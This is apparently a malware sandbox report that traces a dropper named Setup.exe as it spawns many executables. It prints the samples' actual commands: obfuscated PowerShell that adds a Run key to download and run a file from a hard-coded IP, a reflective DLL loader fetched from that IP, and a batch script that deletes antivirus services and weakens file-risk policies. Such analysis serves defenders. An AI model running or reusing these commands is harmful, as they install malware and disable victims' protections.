PID 1808 wrote to memory of 324	1808	Setup.exe	kwYfAn7rWvI3Bd0Widr_mMCb.exe
PID 1808 wrote to memory of 1792	1808	Setup.exe	do0w8S5c9Z6oyqB0T0RTF7PN.exe
PID 1808 wrote to memory of 1792	1808	Setup.exe	do0w8S5c9Z6oyqB0T0RTF7PN.exe
PID 1808 wrote to memory of 1792	1808	Setup.exe	do0w8S5c9Z6oyqB0T0RTF7PN.exe
PID 1808 wrote to memory of 1792	1808	Setup.exe	do0w8S5c9Z6oyqB0T0RTF7PN.exe
PID 1808 wrote to memory of 1060	1808	Setup.exe	lCY5QLNqAnem93OEfP0C_Vm2.exe
PID 1808 wrote to memory of 1060	1808	Setup.exe	lCY5QLNqAnem93OEfP0C_Vm2.exe
PID 1808 wrote to memory of 1060	1808	Setup.exe	lCY5QLNqAnem93OEfP0C_Vm2.exe
PID 1808 wrote to memory of 1060	1808	Setup.exe	lCY5QLNqAnem93OEfP0C_Vm2.exe
PID 1808 wrote to memory of 1764	1808	Setup.exe	NFYLZgpNwsSc01ccwSoFV4bD.exe
PID 1808 wrote to memory of 1764	1808	Setup.exe	NFYLZgpNwsSc01ccwSoFV4bD.exe
PID 1808 wrote to memory of 1764	1808	Setup.exe	NFYLZgpNwsSc01ccwSoFV4bD.exe
PID 1808 wrote to memory of 1764	1808	Setup.exe	NFYLZgpNwsSc01ccwSoFV4bD.exe
PID 1808 wrote to memory of 2032	1808	Setup.exe	JNgBeK3x8i1nLadrgULJBCaS.exe
PID 1808 wrote to memory of 2032	1808	Setup.exe	JNgBeK3x8i1nLadrgULJBCaS.exe
PID 1808 wrote to memory of 2032	1808	Setup.exe	JNgBeK3x8i1nLadrgULJBCaS.exe
PID 1808 wrote to memory of 2032	1808	Setup.exe	JNgBeK3x8i1nLadrgULJBCaS.exe
PID 1792 wrote to memory of 1088	1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe	Runtimebroker.exe
PID 1792 wrote to memory of 1088	1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe	Runtimebroker.exe
PID 1792 wrote to memory of 1088	1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe	Runtimebroker.exe
PID 1792 wrote to memory of 1088	1792	do0w8S5c9Z6oyqB0T0RTF7PN.exe	Runtimebroker.exe
PID 1088 wrote to memory of 588	1088	Runtimebroker.exe	powershell.exe
PID 1088 wrote to memory of 588	1088	Runtimebroker.exe	powershell.exe
PID 1088 wrote to memory of 588	1088	Runtimebroker.exe	powershell.exe
PID 1088 wrote to memory of 588	1088	Runtimebroker.exe	powershell.exe
PID 1808 wrote to memory of 1320	1808	Setup.exe	PenEJEH0A6xi5OAUR35AaDEO.exe
PID 1808 wrote to memory of 1320	1808	Setup.exe	PenEJEH0A6xi5OAUR35AaDEO.exe
PID 1808 wrote to memory of 1320	1808	Setup.exe	PenEJEH0A6xi5OAUR35AaDEO.exe
PID 1808 wrote to memory of 1320	1808	Setup.exe	PenEJEH0A6xi5OAUR35AaDEO.exe
PID 1808 wrote to memory of 1312	1808	Setup.exe	LmZNldMKHYtuUoYYHzPIp7h3.exe
PID 1808 wrote to memory of 1312	1808	Setup.exe	LmZNldMKHYtuUoYYHzPIp7h3.exe
PID 1808 wrote to memory of 1312	1808	Setup.exe	LmZNldMKHYtuUoYYHzPIp7h3.exe
PID 1808 wrote to memory of 1312	1808	Setup.exe	LmZNldMKHYtuUoYYHzPIp7h3.exe
PID 1808 wrote to memory of 1640	1808	Setup.exe	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
PID 1808 wrote to memory of 1640	1808	Setup.exe	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
PID 1808 wrote to memory of 1640	1808	Setup.exe	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
PID 1808 wrote to memory of 1640	1808	Setup.exe	5nmMrSQ7DIeZiD_mvJ9tb8nC.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 1808 wrote to memory of 2120	1808	Setup.exe	exEFL08esRh1mnTiUjUFeDXG.exe
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 2120 wrote to memory of 2164	2120	exEFL08esRh1mnTiUjUFeDXG.exe	exEFL08esRh1mnTiUjUFeDXG.tmp
PID 1808 wrote to memory of 2224	1808	Setup.exe	LWIEoUgdNGDeqUec96ZlCsNI.exe
PID 1808 wrote to memory of 2224	1808	Setup.exe	LWIEoUgdNGDeqUec96ZlCsNI.exe
PID 1808 wrote to memory of 2224	1808	Setup.exe	LWIEoUgdNGDeqUec96ZlCsNI.exe
PID 1808 wrote to memory of 2224	1808	Setup.exe	LWIEoUgdNGDeqUec96ZlCsNI.exe
PID 1808 wrote to memory of 2244	1808	Setup.exe	_pHSZc3WXEPknSDDq6TlcA30.exe
PID 1808 wrote to memory of 2244	1808	Setup.exe	_pHSZc3WXEPknSDDq6TlcA30.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

1552 attrib.exe
3388 attrib.exe

pid	process
1552	attrib.exe
3388	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1808

C:\Users\Admin\Documents\zrFWNMth_T3qUm4429q0tg57.exe
"C:\Users\Admin\Documents\zrFWNMth_T3qUm4429q0tg57.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:740

C:\Users\Admin\Documents\do0w8S5c9Z6oyqB0T0RTF7PN.exe
"C:\Users\Admin\Documents\do0w8S5c9Z6oyqB0T0RTF7PN.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
3⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
4⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
5⤵
PID:3556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
5⤵
PID:3400

C:\Users\Admin\Documents\kwYfAn7rWvI3Bd0Widr_mMCb.exe
"C:\Users\Admin\Documents\kwYfAn7rWvI3Bd0Widr_mMCb.exe"
2⤵
- Executes dropped EXE
PID:324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9335430559.exe"
3⤵
- Loads dropped DLL
PID:2388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "kwYfAn7rWvI3Bd0Widr_mMCb.exe" /f & erase "C:\Users\Admin\Documents\kwYfAn7rWvI3Bd0Widr_mMCb.exe" & exit
3⤵
PID:3960

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "kwYfAn7rWvI3Bd0Widr_mMCb.exe" /f
4⤵
- Kills process with taskkill
PID:3992

C:\Users\Admin\Documents\NFYLZgpNwsSc01ccwSoFV4bD.exe
"C:\Users\Admin\Documents\NFYLZgpNwsSc01ccwSoFV4bD.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1764

C:\Users\Admin\AppData\Local\Temp\932586418.exe
C:\Users\Admin\AppData\Local\Temp\932586418.exe
3⤵
- Executes dropped EXE
PID:2092

C:\Users\Admin\AppData\Local\Temp\932586418.exe
C:\Users\Admin\AppData\Local\Temp\932586418.exe
4⤵
PID:3284

C:\Users\Admin\AppData\Local\Temp\932586418.exe
C:\Users\Admin\AppData\Local\Temp\932586418.exe
4⤵
PID:3300

C:\Users\Admin\AppData\Local\Temp\807875419.exe
C:\Users\Admin\AppData\Local\Temp\807875419.exe
3⤵
PID:3668

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.binance.com/en/register?ref=WDA8929C
3⤵
PID:1484

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1484 CREDAT:275457 /prefetch:2
4⤵
PID:3088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\Documents\NFYLZgpNwsSc01ccwSoFV4bD.exe & exit
3⤵
PID:4032

C:\Windows\SysWOW64\PING.EXE
ping 0
4⤵
- Runs ping.exe
PID:2128

C:\Users\Admin\Documents\lCY5QLNqAnem93OEfP0C_Vm2.exe
"C:\Users\Admin\Documents\lCY5QLNqAnem93OEfP0C_Vm2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Users\Admin\Documents\JNgBeK3x8i1nLadrgULJBCaS.exe
"C:\Users\Admin\Documents\JNgBeK3x8i1nLadrgULJBCaS.exe"
2⤵
- Executes dropped EXE
PID:2032

C:\Users\Admin\Documents\JNgBeK3x8i1nLadrgULJBCaS.exe
"C:\Users\Admin\Documents\JNgBeK3x8i1nLadrgULJBCaS.exe"
3⤵
PID:2480

C:\Users\Admin\Documents\JNgBeK3x8i1nLadrgULJBCaS.exe
"C:\Users\Admin\Documents\JNgBeK3x8i1nLadrgULJBCaS.exe"
3⤵
PID:2616

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:3652

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
5⤵
PID:1772

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1772.0.1041552959\618862224" -parentBuildID 20200403170909 -prefsHandle 1100 -prefMapHandle 1092 -prefsLen 1 -prefMapSize 219622 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1772 "\\.\pipe\gecko-crash-server-pipe.1772" 1164 gpu
6⤵
PID:2252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1772.3.1890415964\445026088" -childID 1 -isForBrowser -prefsHandle 2028 -prefMapHandle 2004 -prefsLen 156 -prefMapSize 219622 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1772 "\\.\pipe\gecko-crash-server-pipe.1772" 2040 tab
6⤵
PID:816

C:\Program Files\Mozilla Firefox\firefox.exe
